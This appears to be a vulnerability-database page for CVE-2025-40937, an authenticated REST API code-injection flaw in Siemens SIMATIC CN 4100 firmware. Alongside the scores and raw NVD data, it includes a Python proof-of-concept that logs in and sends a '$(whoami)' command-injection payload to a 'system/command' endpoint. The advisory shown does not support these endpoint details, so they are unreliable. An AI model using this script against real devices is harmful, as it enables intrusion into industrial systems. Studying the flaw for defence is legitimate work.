Security Vulnerability Report
CVE-2025-40937 CVSS 8.3 HIGH

CVE-2025-40937

Published: 2025-12-09 16:17:47
Last Modified: 2025-12-10 21:37:51

Description

A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application does not properly validate input parameters in its REST API, resulting in improper handling of unexpected arguments. This could allow an authenticated attacker to execute arbitrary code with limited privileges.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:* - NOT VULNERABLE
SIMATIC CN 4100 < V4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40937 PoC - SIMATIC CN 4100 REST API Code Injection # Authenticated RCE via improper input validation import requests import json import sys TARGET_URL = "https://<target-ip>/api/v1/" USERNAME = "<low-privilege-user>" PASSWORD = "<password>" def get_auth_token(): """Obtain authentication token""" login_url = f"{TARGET_URL}auth/login" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=data, verify=False, timeout=10) if response.status_code == 200: return response.json().get('token') return None def exploit(token): """Send malicious request with unexpected arguments""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload exploiting improper input validation exploit_data = { "action": "execute", "command": "whoami", "_unexpected_param": "$(whoami)" } exploit_url = f"{TARGET_URL}system/command" response = requests.post(exploit_url, json=exploit_data, headers=headers, verify=False, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") return response if __name__ == "__main__": print("[*] CVE-2025-40937 PoC for SIMATIC CN 4100") print("[*] Obtaining authentication token...") token = get_auth_token() if token: print("[+] Authentication successful") print("[*] Sending exploit payload...") exploit(token) else: print("[-] Authentication failed") sys.exit(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40937", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.260", "lastModified": "2025-12-10T21:37:50.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application do not properly validate input parameters in its REST API, resulting in improper handling of unexpected arguments.\r\nThis could allow an authenticated attacker to execute arbitrary code with limited privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}